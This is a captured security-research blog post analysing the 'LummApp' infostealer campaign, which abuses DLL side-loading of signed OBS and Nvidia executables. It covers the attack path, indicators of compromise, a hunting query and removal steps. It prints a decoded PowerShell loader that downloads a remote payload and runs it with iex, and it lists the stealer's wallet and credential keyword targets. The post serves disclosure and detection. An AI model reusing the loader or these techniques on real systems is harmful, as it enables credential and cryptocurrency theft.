www.hunters.security Open in urlscan Pro
199.60.103.227  Public Scan

Form analysis
0 forms found in the DOM

Text Content

 * Product
   * SOC Platform
   * Product Tour
   * Integrations
   * Why Hunters
   * FAQs
 * Solutions
   * SIEM Replacement
   * MSSPs
   * Hunters for Snowflake
   * Hunters for Databricks
   * Hunters for AWS
 * Services
   * Team Axon
 * Customers
 * Resources
   * HuntersCON
   * Blog
   * Events
   * Community
 * Company
   * About us
   * Careers
   * Partners
   * Newsroom
 * Get a Demo



Team Axon


LUMMAPP: ADVERSARIES ABUSE TRUSTED OBS SOFTWARE TO DISTRIBUTE INFOSTEALER VIA
DLL SIDE-LOADING

 * * 
     
   * 
   * 

 * Dec 18, 2024
 * By Team Axon
 * 10 minutes to read


 * Table of Contents
     
   * Executive Summary
   * Attack Path
   * Indicators Of Compromise (IOCs)
   * Hunting Queries
   * Removal Guide
   


EXECUTIVE SUMMARY

In October 2024, Team Axon researchers uncovered a notable large-scale threat
campaign, dubbed "LummApp," targeting users and organizations through a
combination of advanced adware and infostealing techniques. Disguised as a
benign application, LummApp deploys malicious browser extensions capable of
exfiltrating data, capturing screen activity, manipulating clipboard contents,
and tracking user browsing behavior.

The campaign was first identified during an investigation into a network
incident at a European company, exposing LummApp’s global reach and unique
attack methods. Likely active since early October 2024, LummApp is distributed
via ZIP files containing MSI installers that deploy the malicious extensions on
compromised devices. It employs advanced evasion techniques, including DLL
SideLoading and heavily obfuscated PowerShell scripts. By exploiting legitimate
DLLs associated with trusted OBS-signed files, the malware bypasses traditional
security measures, enabling persistent and undetected execution.

LummApp also leverages components of the Lumma Info Stealer, a SaaS (Software as
a Service) malware framework designed to extract sensitive information from
infected systems. It belongs to the broader category of info-stealing malware,
primarily targeting user credentials, financial data, and other sensitive
information. Lumma remains a significant threat to individuals and organizations
alike.

 


ATTACK PATH

The attack begins on websites hosting cracked software and torrents, such as
MediaFire. When a user attempts to install software from these sites, a new
pop-up window appears, displaying a visual message stating “Installation in
progress.” Meanwhile, the actual software installation occurs in a separate
browser tab.

Simultaneously, the user is redirected to a Mega.nz link, which provides a ZIP
file for download. Inside this ZIP file is an .MSI file—the malicious payload.
This file initiates the infection process when executed, leveraging user trust
and disguising the malware as a legitimate installer.

MSI Execution

The Microsoft Software Installer (MSI) initiates the attack by creating a
directory within %appdata%/Roaming with a name pattern resembling /XXX XXX
XX/XXXXApp/. This directory is populated with all necessary files for the
following stages of the attack, including DLLs, executables, and configuration
files.

The attacker utilizes UnRAR.exe to unpack a malicious DLL required for the next
phase, which involves a DLL sideloading technique.

In various versions of this campaign, the UnRAR.exe command consistently appears
with similar parameters, often using the same password to unpack files. The
command is structured as follows:

"UnRAR.exe" x -p2161183588a "<path_to_directory>/RoxiApp/kafkjo.rar"
"<path_to_directory>/RoxiApp/"


Figure 1: App directory structure

During installation, the MSI file runs a signed executable from a trusted,
well-known company. However, this executable is vulnerable to a DLL sideloading
exploit, which the attacker uses to load a malicious DLL from a newly created
directory. By exploiting this weakness, the malware bypasses security controls
and executes further malicious actions on the system.

Notable executables observed in this campaign include:

 * Nvidia GeForce Experience.exe
 * obs-ffmpeg-mux.exe

Figure 2: Screenshot of Procmon with filter "DLL file not found"

DLL Sideloading

Once executed, the legitimate executable searches for a DLL with a specific name
in its current directory. When placed in an attacker-controlled directory within
AppData, it discovers and loads the malicious DLL planted there. This DLL,
previously unpacked and containing obfuscated code, evades detection mechanisms.

After being loaded, the malicious DLL injects a Lummac2 executable into
explorer.exe, allowing the attacker to execute additional payloads and actions
under the guise of a trusted system process.

Our analysis reveals the following activities performed by the injected
explorer.exe process:

 1. Screenshot Capture: Takes a screenshot of the host environment
 2. Host Information Gathering: Collects system details such as hostname and
    username
 3. Credential Theft: Extracts cookies and stored user passwords from installed
    web browsers
 4. Targeted Directory Scanning: Scans directories on the host for files
    containing specific keywords, primarily related to cryptocurrency and email
    applications, including:
    * .kdbx (KeePass password database files)
    * seed (phrases or keys)
    * pass (password-related files)
    * ledger and trezor (cryptocurrency hardware wallets)
    * metamask and bitcoin (cryptocurrency wallet files)
    * words (seed phrases or encrypted data)
    * wallet (digital wallets)
    * Thebird (application or proprietary names)
    * Pmail, emClient, and mailbird (email client-related data)
 5. Data Exfiltration: The collected data is then exfiltrated to external
    domains, enabling remote access to stolen credentials, digital wallet
    information, and other sensitive data. The data is sent to these domains:
    * Gulbur[.]com
    * Hit-bone[.]com
    * L-back[.]com
    * Livedjudhr[.]cyou
 6. Execution of Encoded PowerShell Commands: Executes encoded PowerShell
    commands as part of the attack’s next stage to deploy malicious browser
    extension.

This activity highlights the threat’s focus on sensitive data, including
financial and personal information, using multiple techniques to avoid detection
and persist within the environment.

Figure 2 - Attempt to access crypto wallets

Encoded PowerShell command

Stage 1

Figure 3 - PowerShell execution

An encoded PowerShell command was executed by the injected Explorer.exe. Here is
an example of the decoded command.

$VEkiM = ("Qh0+CQMxQjk/Mx1AOBRERio7BxZAKAcfHwg4Fj80JAckRDlFKjw+ORgXTU0=")
$cehG9 = $VEkiM.Replace("@", "a")
$E7Bu1 = [Convert]::FromBase64String($cehG9) | ForEach-Object { $_ -bxor 112}
$rRtwl = [System.Text.Encoding]::ASCII.GetString($E7Bu1).Replace("@", "a")
$uk89P = [Convert]::FromBase64String($rRtwl)
$a43xC = [byte[]](178, 23, 6, 192, 126);
$qefST = 0;
$xlnIE = $uk89P | ForEach-Object {
$_ -bxor $a43xC[$qefST++];
if ($qefST -ge $a43xC.Length) {
$qefST = 0
}
}
$cd4to=new-object System.Net.Webclient;
$ODs6C = [System.Text.Encoding]::ASCII.GetString($xlnIE);
$Rl13o=$cd4to.DownloadString($ODs6C);
$rGlTq = $Rl13o.Replace("!", "l").Replace("*", "d").Replace("`"", "T").Replace("'", "H").Replace(";", "F")
$hluEJ = [Convert]::FromBase64String($rGlTq)
[System.Text.Encoding]::ASCII.GetString($hluEJ) | iex


Ps
Copy

The script defines a base64-encoded string $VEkiM, decodes it, and applies an
XOR operation (value 112). After further decoding using a byte array $a43xC, it
retrieves a URL, hXXps://tcl-black[.]com/2010[].]bs64, using
System.Net.WebClient.

The downloaded content undergoes character replacement and Base64 decoding to
yield a second encoded command, which is then executed with IEX
(Invoke-Expression). The URL returns a large obfuscated command, marking the
next stage of the attack.

Stage 2

The decoded command initiates several obfuscation-heavy support functions and
processes a large, comma-separated base64 string spanning over 3,400 lines.




Here's a summary of the command's actions:

 * Produces an 80-character random string, which is used to name the browser
   extension
 * Creates a randomly named directory in the AppData\Local folder with the
   randomized string as its name
 * Adjusts settings in "Secure Preferences" or "Preferences" files for
   Chromium-based browsers, specifically targeting Chrome, Brave, Edge, and
   Opera
 * Processes the massive base64 string as an array, iterating through each pair
   of objects
   * Decodes the first object as the filename
   * Decodes the second object as the file content
 * Checks if the file is a PNG, printing “Saved PNG file: {filename} size
   {filecontent.length} bytes.”
 * Saves each file in the newly created random directory within AppData

The resulting files form a browser extension, primed for the campaign’s next
stage. This extension is designed to conduct further actions within the target
environment.

Browser Extension

Based on our research, the end goal of the malware is to deploy a browser
extension, which is composed of heavily obfuscated JavaScript functions.

Figure 4 - Malicious browser extension 

The browser extension directory structure is split between 2 main libraries: 

 1. Finders:
    The finders directory contains scripts that handle file searching, data
    retrieval, and processing using encoded paths and patterns. Key
    functionalities include ZIP file creation, data storage and retrieval (often
    from Chrome storage), regex-based file pattern matching, and HTTP data
    transfer. Obfuscation in some files suggests a focus on privacy or detection
    evasion, with JSZip used for ZIP file manipulation across environments.
    
    
 2. Functions:
    

 * Creates Chrome notifications with unique IDs and customizable content (icons,
   titles, messages), manages click events, and clears notifications as needed
 * Captures screenshots of active browser tabs and applies configurable rules,
   possibly fetched from external sources, to modify screenshot behavior
 * Gathers detailed system information (CPU, memory, OS, display, WebGL) and
   generates/stores unique identifiers for device tracking
 * Sends and receives data via fetch requests, including options to handle
   finance-related data, set up reverse proxies, or handle cookies
 * Retrieves browsing history, manages active tabs, and opens new URLs,
   potentially for behavior tracking or redirection
 * Disables CSP to allow additional scripts or resources to load using Chrome’s
   network request rules
 * Uses Chrome’s local storage to store and retrieve data persistently,
   including settings, user interactions, or fetched data from APIs
 * Establishes WebSocket connections for real-time server interaction,
   potentially for monitoring or instant data exchange
 * eventGrab: Monitors and captures changes in input fields, storing captured
   values in eventGrabInfo for later use.



INDICATORS OF COMPROMISE (IOCS)

Domains:

 * Gulbur[.]com
 * Hit-bone[.]com
 * L-back[.]com
 * Livedjudhr[.]cyou
 * Key-pack[.]com
 * Tcl-black[.]com
 * True-lie[.]com

URLs:

 * hXXps://true-lie[.]com/api/machine/set-files-v

Hashes:

 * CiviApp - avcodec-60.dll:
   C92a0d040e76ec6a10a462f13bfc0c382da93e616fc8b981fb37ba89382e5019
 * RoxiApp - avcodec-60.dll:
   9e8838f69a052e985cd4affdc5510381eeaca72852bc968f0e1af2f708a8ab47
 * KcuzApp - avcodec-60.dll:
   ce6c57787ece91e9db53bfb4f5a8abeac191ded2b45b0552640fedf80173635a
   
   


HUNTING QUERIES

SELECT *
FROM INVESTIGATION.EDR_PROCESS_CREATION_EVENTS
WHERE EVENT_TIME > current_timestamp - interval '30d'
  AND (
       INITIATING_PROCESS_PATH ILIKE '%appdata%app%obs-ffmpeg-mux.exe%'
       OR TARGET_PROCESS_PATH ILIKE '%appdata%app%obs-ffmpeg-mux.exe%'
       OR PARENT_PROCESS_PATH ILIKE '%appdata%app%obs-ffmpeg-mux.exe%'
       OR INITIATING_PROCESS_PATH ILIKE '%appdata%app%nvidia%'
       OR TARGET_PROCESS_PATH ILIKE '%appdata%app%nvidia%'
       OR PARENT_PROCESS_PATH ILIKE '%appdata%app%nvidia%'
       OR TARGET_PROCESS_COMMANDLINE ILIKE '%explorer.exe explorer.exe'
   );


SQL
Copy


 


REMOVAL GUIDE

Uninstall Suspicious Applications

 1. Open Control Panel > Programs and Features (or Add/Remove Programs)
 2. Look for suspicious entries like RoxiApp, KcuzApp, or similar unusual names
 3. Select and uninstall these programs
    
    

Check Browser Extensions

 1. Open your browser and go to the Extensions or Add-ons settings
 2. Remove unknown or untrusted extensions, including all files stored in
    AppData related to that browser extension
 3. Reset your browser settings if necessary
    
    

Check for Persistence mechanisms:
In the samples analyzed by Hunters, no persistence mechanisms were identified.
However, we recommend checking for potential persistence mechanisms that may
have been created by this campaign, such as entries in Task Scheduler, Startup
programs, or Registry Run keys.

To stay updated on threat-hunting research, activities, and queries, follow Team
Axon’s X/Twitter account (@team__axon). 




RELEVANT POSTS


Team Axon

UNMASKING VEILDRIVE: THREAT ACTORS EXPLOIT MICROSOFT SERVICES FOR C2

Team Axon Nov 4, 2024

Team Axon

INVESTIGATING UNC5537: SNOWFLAKE DATABASE THREAT CAMPAIGN

Team Axon Sep 11, 2024

Research, Team Axon

PROTECTING POSTGRES: KEY SECURITY TAKEAWAYS FROM A POSTGRES HONEYPOT

Team Axon Apr 10, 2024


PRODUCT

 * SOC Platform
 * Product Tour
 * Integrations
 * Why Hunters
 * FAQs

SOLUTIONS

 * SIEM Replacement
 * MSSPs
 * Hunters for Snowflake
 * Hunters For Databricks
 * Hunters for AWS

SERVICES

 * Team Axon

 * CUSTOMERS

RESOURCES

 * HuntersCON
 * Blog
 * Events
 * Community

COMPANY

 * About Us
 * Careers
 * Partners
 * Newsroom

 * 
 * 
 * 
 * 

HUNTERS © 2024 All rights reserved

Terms and ConditionsPrivacy Policy